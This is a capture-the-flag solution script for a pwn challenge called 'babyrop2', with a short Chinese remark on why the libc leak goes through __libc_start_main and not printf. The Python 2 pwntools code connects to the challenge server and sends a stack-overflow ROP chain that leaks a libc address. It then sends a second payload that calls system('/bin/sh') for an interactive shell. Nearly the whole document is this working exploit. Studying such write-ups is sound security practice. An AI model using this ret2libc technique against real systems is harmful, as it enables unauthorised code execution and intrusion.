ret2libc。记一下：因为这里的 libc 版本为 libc6_2.27-3ubuntu1.2_amd64，printf() 的 plt 表地址结尾为 f00，会产生截断，所以不能用 printf() 泄露，可以使用 __libc_start_main。

from pwn import *

# Target binary; PLT/GOT entries and addresses below are read from it.
elf = ELF('./babyrop2')

# Switch between a local process and the remote instance. The remote branch
# expects the challenge's `libc.so.6` in the working directory; every offset
# computed below is only meaningful if that file matches the remote libc.
local = 0
if local == 1:
    io = process('./babyrop2')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('node4.buuoj.cn',25717)
    libc  = ELF('libc.so.6')

printf_plt = elf.plt['printf']
printf_got = elf.got['printf']   # assigned but never used; the leak goes through __libc_start_main (see note at top of file)
libc_start_main = elf.got['__libc_start_main']

# Hard-coded addresses taken from the binary: main's address and a gadget
# named rdi_ret (presumably `pop rdi; ret` -- verify in a disassembler).
# Fixed 0x400... values imply a non-PIE binary and the overflow below implies
# no stack protector on this path; TODO confirm both with checksec.
main_addr = 0x400636
rdi_ret = 0x0000000000400733
# Stage 1: 0x20 bytes of filler, 8 bytes that land on the saved frame pointer
# (0xdeadbeef, presumably), then the return chain: put the GOT slot address in
# rdi, call printf@plt so it prints the resolved libc pointer stored there,
# and return to main so a second overflow can be sent.
payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(libc_start_main)+p64(printf_plt)+p64(main_addr)
io.sendline(payload)
io.recvline()   # discard one line before the leak (presumably the program's own output -- verify)

# Read the 6 significant bytes of the leaked pointer and zero-pad to 8 for u64.
# NOTE: the str + bytes concatenation here and .next() below are Python 2 only.
libc_start_main_addr = u64(io.recv(6)+'\x00\x00')
libc_base = libc_start_main_addr - libc.symbols['__libc_start_main']
log.success("libc_base:"+hex(libc_base))
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()

# Stage 2: same overflow layout, this time returning into system with the
# libc-resident "/bin/sh" string as its argument.
payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(binsh)+p64(system_addr)
io.sendline(payload)

io.interactive()